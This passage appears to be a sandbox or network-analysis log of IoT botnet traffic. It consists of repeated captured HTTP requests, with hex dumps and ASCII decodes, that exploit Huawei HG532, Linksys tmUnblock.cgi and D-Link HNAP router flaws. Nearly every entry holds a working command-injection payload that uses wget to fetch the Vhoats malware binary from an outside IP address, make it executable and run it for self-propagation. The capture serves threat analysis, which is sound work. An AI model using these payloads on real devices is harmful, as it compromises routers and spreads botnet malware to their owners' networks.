2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 